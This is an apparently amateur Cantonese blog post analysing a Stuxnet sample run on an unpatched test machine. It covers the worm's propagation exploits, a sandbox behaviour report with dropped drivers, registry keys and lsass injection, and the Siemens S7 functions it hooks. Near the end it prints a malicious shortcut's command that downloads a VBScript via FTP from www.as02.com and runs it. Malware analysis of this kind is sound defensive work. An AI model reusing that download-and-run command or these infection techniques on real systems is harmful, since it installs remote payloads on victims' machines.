今日, 終於下載左Stuxnet病毒樣本
關於Stuxnet病毒(Wiki): http://zh.wikipedia.org/zh-hk/%E9%9C%87%E7%BD%91
關於Stuxnet病毒(Yahoo! News): http://hk.news.yahoo.com/article/100930/4/khmp.html
首先, 測試平台為Windows 7 x64 (未有更新漏洞MS08-067,MS10-046,MS10-061),
斷左LAN線, 插入左一支512MB手指(用作收集Stuxnet感染後既檔案, 已報銷, 相信現在已在堆填區中) .
然後再在NoteBook實機分析生成物.
一、傳播途徑 (從網上Copy+自已補充)
1.利用Windows Shell快捷方式漏洞(MS10-046)和U盤傳播
U盤傳播是Worm/Stuxnet主要傳播途徑之一。病毒會在移動存儲設備的根目錄下創建如下病毒文件:
~WTR4132.tmp
~WTR4141.tmp
同時,還會創建下列快捷方式文件,指向~WTR4141.tmp文件:
Copy of Shortcut to.lnk
Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Copy of Shortcut to.lnk
在沒有安裝MS10-046補丁的Windows系統中上使用被感染的U盤時,只需在資源管理器中訪問U盤根目錄,即會自動加載病毒模塊~WTR4141.tmp,~WTR4141.tmp進而加載~WTR4132.tmp,造成系統感染。
2.利用MS10-061漏洞和WBEM傳播
病毒會利用Windows Spooler漏洞(MS10-061),攻擊局域網上開啟了“文件和打印機共享”的機器。被成功攻陷的計算機上會生成2個病毒文件:
%SystemDir%\winsta.exe
%SystemDir%\wbem\mof\sysnullevnt.mof
%SystemDir%\wbem\mof\sysnullevnt.mof將會在某時刻自動執行%SystemDir%\winsta.exe(即病毒文件),造成感染。
3.利用共享文件夾傳播
病毒掃描局域網機器的默認共享C$和admin$,並嘗試在遠程計算機上創建病毒文件:
DEFRAG<隨機數字>.TMP
文件創建成功後,病毒會再遠程創建一個計劃任務,來定時啟動病毒體。
4.利用MS08-067漏洞傳播
病毒向存在MS08-067漏洞的遠程計算機發送惡意RPC請求,一旦攻擊成功,即可完全控制被攻擊計算機,進行感染。
  
Kaspersky 報 Trojan-Dropper.Win32.Stuxnet.d 和 Trojan-Dropper.Win32.Stuxnet.b
其他生成物
1.Ink ---> Exploit.Win32.Agent.ee
1.exe ---> Backdoor.Win32.Hupigon.lnqy
knk.file ---> Trojan-Downloader.JS.Agent.dhd
nk.txt ---> Trojan-Downloader.JS.Agent.dhe
1.exe ---> Trojan-GameThief.Win32.OnLineGames.ukoe
jnk,txt ---> Trojan-Downloader.JS.Agent.dhc
~wtr4132.tmp 行為分析:
File Info
| Name |
Value |
| Size |
517632 |
| MD5 |
74ddc49a7c121a61b8d06c03f92d0c13 |
| SHA1 |
0ccbc128dd8bf73dc7b3922fb67d26bbcdbcaa89 |
| SHA256 |
743e16b3ef4d39fc11c5e8ec890dcd29f034a6eca51be4f7fca6e23e60dbd7a1 |
| Process |
Exited |
Keys Created
| Name |
Last Write Time |
| LM\System\CurrentControlSet\Services\MRxCls |
2009.01.12 14:47:59.984 |
| LM\System\CurrentControlSet\Services\MRxCls\Enum |
2009.01.12 14:48:00.093 |
| LM\System\CurrentControlSet\Services\MRxNet |
2009.01.12 14:48:00.312 |
| LM\System\CurrentControlSet\Services\MRxNet\Enum |
2009.01.12 14:48:00.312 |
Values Created
| Name |
Type |
Size |
Value |
| LM\System\CurrentControlSet\Services\MRxCls\Data |
REG_BINARY |
433 |
? |
| LM\System\CurrentControlSet\Services\MRxCls\Description |
REG_SZ |
14 |
"MRXCLS" |
| LM\System\CurrentControlSet\Services\MRxCls\DisplayName |
REG_SZ |
14 |
"MRXCLS" |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\0 |
REG_SZ |
48 |
"Root\LEGACY_MRXCLS\0000" |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\Count |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\NextInstance |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\ErrorControl |
REG_DWORD |
4 |
0x0 |
| LM\System\CurrentControlSet\Services\MRxCls\Group |
REG_SZ |
16 |
"Network" |
| LM\System\CurrentControlSet\Services\MRxCls\ImagePath |
REG_SZ |
86 |
"\??\C:\WINDOWS\system32\Drivers\mrxcls.sys" |
| LM\System\CurrentControlSet\Services\MRxCls\Start |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\Type |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Description |
REG_SZ |
14 |
"MRXNET" |
| LM\System\CurrentControlSet\Services\MRxNet\DisplayName |
REG_SZ |
14 |
"MRXNET" |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\0 |
REG_SZ |
48 |
"Root\LEGACY_MRXNET\0000" |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\Count |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\NextInstance |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\ErrorControl |
REG_DWORD |
4 |
0x0 |
| LM\System\CurrentControlSet\Services\MRxNet\Group |
REG_SZ |
16 |
"Network" |
| LM\System\CurrentControlSet\Services\MRxNet\ImagePath |
REG_SZ |
86 |
"\??\C:\WINDOWS\system32\Drivers\mrxnet.sys" |
| LM\System\CurrentControlSet\Services\MRxNet\Start |
REG_DWORD |
4 |
0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Type |
REG_DWORD |
4 |
0x1 |
Files Created
| Name |
Size |
Last Write Time |
Creation Time |
Last Access Time |
Attr |
| C:\Documents and Settings\User\Local Settings\Temp\~DF1.tmp |
498176 |
2009.01.12 14:47:59.406 |
2009.01.12 14:47:59.203 |
2009.01.12 14:47:59.203 |
0x20 |
| C:\Documents and Settings\User\Local Settings\Temp\~DF2.tmp |
90 |
2009.01.12 14:47:59.406 |
2009.01.12 14:47:59.203 |
2009.01.12 14:47:59.203 |
0x20 |
| C:\Documents and Settings\User\Local Settings\Temp\~DF3.tmp |
6619 |
2009.01.12 14:47:59.625 |
2009.01.12 14:47:59.218 |
2009.01.12 14:47:59.218 |
0x20 |
| C:\WINDOWS\inf\mdmcpq3.PNF |
6619 |
2008.07.31 16:58:13.796 |
2008.07.31 16:58:13.656 |
2008.07.31 16:58:13.796 |
0x80 |
| C:\WINDOWS\inf\mdmeric3.PNF |
90 |
2008.07.31 16:58:13.796 |
2008.07.31 16:58:13.656 |
2008.07.31 16:58:13.796 |
0x80 |
| C:\WINDOWS\inf\oem7A.PNF |
498176 |
2008.07.31 16:58:13.796 |
2008.07.31 16:58:13.656 |
2008.07.31 16:58:13.796 |
0x80 |
| C:\WINDOWS\system32\drivers\mrxcls.sys |
26616 |
2007.07.27 12:00:00.000 |
2007.07.27 12:00:00.000 |
2008.08.01 06:08:41.921 |
0x80 |
| C:\WINDOWS\system32\drivers\mrxnet.sys |
17400 |
2007.07.27 12:00:00.000 |
2007.07.27 12:00:00.000 |
2008.08.01 06:08:41.921 |
0x80 |
Drivers Loaded
| Base |
Size |
Flags |
Image Name |
| 0xf8a6e000 |
0x3000 |
0x9104000 |
\??\C:\WINDOWS\system32\Drivers\mrxnet.sys |
| 0xf9cfc000 |
0x5000 |
0x9004000 |
\??\C:\WINDOWS\system32\Drivers\mrxcls.sys |
Processes Created
| PId |
Process Name |
Image Name |
| 0x374 |
lsass.exe |
C:\WINDOWS\system32\lsass.exe |
Threads Created
| PId |
Process Name |
TId |
Start |
Start Mem |
Win32 Start |
Win32 Start Mem |
| 0x344 |
svchost.exe |
0x170 |
0x7c810856 |
MEM_IMAGE |
0x7c910760 |
MEM_IMAGE |
| 0x374 |
lsass.exe |
0x7a8 |
0x7c810856 |
MEM_IMAGE |
0xa30690 |
MEM_MAPPED |
| 0x374 |
lsass.exe |
0x7bc |
0x7c810856 |
MEM_IMAGE |
0x77df9981 |
MEM_IMAGE |
| 0x374 |
lsass.exe |
0x7cc |
0x7c810867 |
MEM_IMAGE |
0x10014bd |
MEM_MAPPED |
| 0x374 |
lsass.exe |
0x7d0 |
0x7c810856 |
MEM_IMAGE |
0x10031bc |
MEM_MAPPED |
| 0x374 |
lsass.exe |
0x7d8 |
0x7c810856 |
MEM_IMAGE |
0xa304f2 |
MEM_MAPPED |
| 0x404 |
svchost.exe |
0x7b8 |
0x7c810856 |
MEM_IMAGE |
0x77e76bf0 |
MEM_IMAGE |
Windows Api Calls
| PId |
Image Name |
Address |
Function ( Parameters ) | Return Value |
| 0x3ec |
C:\WINDOWS\system32\lsass.exe |
0x10023ac |
CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x7504f2, lpParameter: 0x750000, dwCreationFlags: 0x0, lpThreadId: 0x0)|0x7a4 |
| 0x770 |
C:\WINDOWS\system32\lsass.exe |
0x10023ac |
CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x12a04f2, lpParameter: 0x12a0000, dwCreationFlags: 0x0, lpThreadId: 0x0)|0x7a4 |
| 0x364 |
C:\WINDOWS\system32\lsass.exe |
0x10023ac |
CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x6a04f2, lpParameter: 0x6a0000, dwCreationFlags: 0x0, lpThreadId: 0x0)|0x7a4 |
DNS Queries
| DNS Query Text |
| www.windowsupdate.com IN A + |
| www.windowsupdate.com IN A + |
Mutexes Created or Opened
| PId |
Image Name |
Address |
Mutex Name |
| 0x358 |
C:\TEST\sample.exe |
0x9a2199 |
JCEINK |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd4246b |
SxS_ |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd424b6 |
Global\{62BBECCC-536F-4dc6-A387-8B1A17CF8A75} |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd62199 |
FEEIJO |
| 0x400 |
C:\WINDOWS\system32\lsass.exe |
0x8a24b6 |
Global\{5EC171BB-F130-4a19-B782-B6E655E091B2} |
Events Created or Opened
| PId |
Image Name |
Address |
Event Name |
| 0x358 |
C:\TEST\sample.exe |
0x769c4ec2 |
Global\userenv: User Profile setup event |
| 0x358 |
C:\TEST\sample.exe |
0x77a89422 |
Global\crypt32LogoffEvent |
| 0x358 |
C:\TEST\sample.exe |
0x985e01 |
Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0x77a89422 |
Global\crypt32LogoffEvent |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0x77de5f48 |
Global\SvcctrlStartEvent_A3752DX |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd45da4 |
Global\WkssvcShutdownEvent |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd45da4 |
Global\WkssvcShutdownEvent2 |
| 0x374 |
C:\WINDOWS\system32\lsass.exe |
0xd45e01 |
Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
| 0x400 |
C:\WINDOWS\system32\lsass.exe |
0x769c4ec2 |
Global\userenv: User Profile setup event |
| 0x400 |
C:\WINDOWS\system32\lsass.exe |
0x77a89410 |
Global\crypt32LogoffEvent |
| 0x400 |
C:\WINDOWS\system32\lsass.exe |
0x8a5e01 |
Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
從以上結果顯示, Stuxnet會安裝Driver並取得電腦控制權
病毒釋放出文件系統過濾驅動mrxnet.sys,從內核層面對病毒文件進行隱藏。驅動層隱藏在功能目的上,與上述用戶層隱藏是一致的。
Worm/Stuxnet會為mrxnet.sys創建一個系統服務,服務名為MRXNET,每次系統啟動時自動加載。
Mrxcls.sys將會向名稱為services.exe,S7tgtopx.exe,CCProjectMgr.exe的進程中註入並執行病毒代碼。 S7tgtopx.exe和CCProjectMgr.exe都是與西門子系統相關的進程。被注入的代碼尋找名為“s7otbxsx.dll”的模塊,並嘗試hook該模塊中的下列API函數:
s7_event
s7ag_bub_cycl_read_create
s7ag_bub_read_var
s7ag_bub_write_var
s7ag_link_in
s7ag_read_szl
s7ag_test
s7blk_delete
s7blk_findfirst
s7blk_findnext
s7blk_read
s7blk_write
s7db_close
s7db_open
s7ag_bub_read_var_seg
s7ag_bub_write_var_seg
還有其他Ink攻撃:
jpg-as02.Ink原始碼: %windir%\system32\cmd.exe /c echo open www.as02.com>>l.t&echo as02>>l.t&echo 111>>l.t&echo get nk %windir%\nk.vbs>>l.t&echo bye>>l.t&ftp -s:l.t&del l.t&start %windir%\nk.vbs&
E隻毒既編碼異常複雜, 有D位都唔知佢做緊咩, 有D生成物既編碼睇完都唔知佢寫緊D咩....
| 
